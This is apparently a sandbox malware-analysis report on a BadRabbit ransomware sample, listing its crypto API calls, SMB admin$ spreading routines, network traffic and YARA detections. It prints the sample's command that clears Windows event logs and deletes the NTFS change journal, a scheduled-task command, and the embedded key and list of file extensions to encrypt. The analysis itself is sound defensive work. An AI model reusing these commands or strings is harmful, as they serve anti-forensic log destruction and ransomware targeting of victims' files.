Source: C:\Windows\dispci.exe | Code function: 32_2_00A81080 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,32_2_00A81080
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81000 CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,32_2_00A81000
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81810 CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,LocalFree,LocalFree,32_2_00A81810
Source: C:\Windows\dispci.exe | Code function: 32_2_00A815A0 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,32_2_00A815A0
Source: C:\Windows\dispci.exe | Code function: 32_2_00A819F0 CryptDuplicateKey,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptDecrypt,FlushViewOfFile,_wprintf,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,SetEvent,SetEvent,32_2_00A819F0
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81DF0 CryptCreateHash,CryptHashData,CryptGetHashParam,32_2_00A81DF0
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81160 CryptEncrypt,CryptEncrypt,LocalAlloc,_memmove,CryptEncrypt,LocalFree,32_2_00A81160
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81D70 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,32_2_00A81D70
Source: C:\Windows\dispci.exe | Code function: 32_2_00A812A0 CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,32_2_00A812A0
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81220 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,32_2_00A81220
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81E40 CreateEventW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,32_2_00A81E40
Source: C:\Windows\dispci.exe | Code function: 32_2_00A843B7 CryptReleaseContext,32_2_00A843B7
Source: LisectAVT_2403002C_35.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: LisectAVT_2403002C_35.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: lsasrv.pdb source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lsasrv.pdbUGP source: D99F.tmp, 00000013.00000003.1281322886.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr

Spreading

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$ 3_2_04BF9534
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$ 3_2_04BF9B63
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,3_2_04BF5E9F
Source: C:\Windows\dispci.exe | Code function: 32_2_00A81B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose,32_2_00A81B80

          Networking

          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.98.116.138 445
          Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
          Source: global trafficTCP traffic: 192.168.2.7:49674 -> 104.98.116.138:443
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF1EB9 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_04BF1EB9
          Source: global trafficDNS traffic detected: DNS query: time.windows.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/8.
          Source: rundll32.exe, 00000003.00000002.1324901443.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: svchost.exe, 0000002A.00000002.2727131392.0000017215800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp, cscc.dat.3.dr, dispci.exe.3.drString found in binary or memory: http://diskcryptor.net/
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.42.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.42.dr, qmgr.db.42.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ocsp.thawte.com0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://rb.symcb.com/rb.crl0W
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://rb.symcb.com/rb.crt0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://rb.symcd.com0&
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://s.symcd.com0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://s.symcd.com06
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://sf.symcb.com/sf.crl0W
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://sf.symcd.com0&
          Source: regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.11.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: LisectAVT_2403002C_35.exe, cscc.dat.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: svchost.exe, 00000007.00000002.1370159028.000002C81BE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comc
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/cps0%
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/rpa0
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/rpa0.
          Source: LisectAVT_2403002C_35.exeString found in binary or memory: https://d.symcb.com/rpa06
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
          Source: svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370617675.000002C81BE70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000007.00000002.1370673738.000002C81BE76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364010188.000002C81BE74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364865383.000002C81BE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
          Source: svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000002A.00000003.1320828736.00000172154F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: qmgr.db.42.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000007.00000003.1364904828.000002C81BE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: C:\Windows\dispci.exeCode function: 32_2_00A842A0 SetWindowsHookExW 00000002,Function_00003FC0,00000000,0000000032_2_00A842A0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A84070 GetDesktopWindow,GetForegroundWindow,GetShellWindow,GetCapture,GetClipboardOwner,GetOpenClipboardWindow,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetFocus,GetActiveWindow,GetKBCodePage,GetCursor,GetLastActivePopup,GetProcessHeap,GetQueueStatus,GetInputState,GetMessageTime,GetOEMCP,GetCursorInfo,GetCaretPos,GetCurrentThread,GetThreadTimes,GetCurrentProcess,GetCurrentProcess,GetProcessTimes,GetCurrentProcess,K32GetProcessMemoryInfo,QueryPerformanceCounter,GlobalMemoryStatusEx,EnumWindows,32_2_00A84070

          Spam, unwanted Advertisements and Ransom Demands

          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4828, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: dispci.exe PID: 7868, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_04BF15A7

          System Summary

          Source: LisectAVT_2403002C_35.exe, type: SAMPLEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 0.2.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.3.rundll32.exe.32943b8.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 0.2.LisectAVT_2403002C_35.exe.ede2e0.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 19.0.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
          Source: 0.0.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 19.2.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
          Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.3.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.2.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.3.rundll32.exe.32943b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
          Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: rundll32.exe, 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN 